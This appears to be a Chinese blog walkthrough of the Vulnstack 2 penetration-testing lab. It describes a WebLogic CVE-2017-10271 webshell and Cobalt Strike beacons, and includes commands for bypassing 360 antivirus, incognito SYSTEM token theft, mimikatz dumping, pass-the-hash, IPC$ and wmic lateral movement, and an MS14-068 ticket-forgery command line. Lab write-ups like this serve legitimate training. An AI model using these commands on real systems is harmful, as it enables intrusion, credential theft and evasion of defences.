Vulnstack(二)

kali 192.168.111.128

WEB 10.10.10.80 192.168.111.80

PC 10.10.10.201 192.168.111.201

DC 10.10.10.10

需要先手动去web机子上开startweblogic.bat

weblogicScan扫一下发现有cve-2017-10271,尝试直接弹shell弹不回来,想到之前看到的360,上去看了一眼
图片
换一个payload好了
图片
把冰蝎马传上去然后冰蝎连接
图片
然后要么弹msf,要么弹cs,冰蝎默认的msf有点小坑,弹回来之后很多模块比如mimikatz没有,所以这里选择传cs的马上去,上线

想添加个用户又被360检测了,这里学到了cs能用argue污染参数,http://www.0x3.biz/archives/837.html
图片
然后使用execute net1 user添加用户就不会被检测到了
图片
配置代理连上远程
图片
接下来先尝试提权,查看补丁命令

wmic qfe GET hotfixid

这里我用cs自带的提权一直不成功,直接用payload还被360挡,我吐了
看到篇文章使用incognito偷取token,msf有自带的
https://blog.csdn.net/qq_45521281/article/details/105941102

incognito.exe list_tokens -u

图片
可以看到system的token是avaliable的,如下命令会盗用system的token去创建一个cmd进程

incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

图片
那么我们在cs上用这个token创建一个弹shell的进程就能弹回来system权限的了(而且最重要的是这个不会被杀,很灵性)

shell incognito.exe execute -c "NT AUTHORITY\SYSTEM" C:\Oracle\Middleware\user_projects\domains\base_domain\9002.exe

9002是cs马图片
system上线
图片
mimikatz抓密码,hashdump
图片
淦,这里环境没开服务,重新抓一下
图片
域内用户
图片
net view看一下10段内机子
图片
确定DC为域控,ip为10.10.10.10
图片
这里arp -a发现了另一台域内主机为10.10.10.201
图片
由于201开了防火墙所以net view不能找到这台主机

pass the hash,右键选择make token
图片
这样就能成功访问域控资源
图片
然后net use建立连接,并且可以上传下载文件

net use \ip\ipc$ pawword /user:username 建立IPC连接
copy hacker.exe \10.10.10.10\C$\windows\temp 复制本地文件到目标服务器
copy \10.10.10.10\c$\windows\temp\hash.txt 复制目标服务器文件到本地

图片
然后可以通过wmic执行命令,其实是创建进程

shell wmic /node:10.10.10.10 /user:de1ay /password:1qaz@WSX process call create "c:\windows\temp\2224.exe"

但是域控没有nat不能出网,所以这里使用cs的中转路由,通过10.10.10.10当作跳板机把shell弹回来
图片
操作如下
图片
然后用这个listener生成exe,上传,wmic执行,域控上线
图片
图片
上面这个是pass the hash,得知道域管的hash才行,而pass the ticket可以通过普通域用户伪造票据凭证
https://www.cnblogs.com/bmjoker/p/10355979.html

shell wmic useraccount get name, sid

首先需要域内普通用户,这里得到mssql用户的sid
图片
然后用ms14-068

proxychains python ms14-068.py -u mssql@de1ay.com -s S-1-5-21-2756371121-2868759905-3853650604-2103 -d 10.10.10.10 -p '1qaz@WSX'

图片
然后使用KrbCredExport转换成凭证

python KrbCredExport.py TGT_mssql@de1ay.com.ccache mssql.ticket

到cs里使用

kerberos_ticket_purge #清除凭证
kerberos_ticket_use mssql.ticket #注入凭证

然后就跟上面pass the hash做法一样,访问域控资源,上传,wmic执行
但是我这里死都不行我吐了
图片
还是pass the hash做吧..

扫一下201,发现3389开着
图片
代理连一下,用之前抓到的密码
图片
上线到cs
图片

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇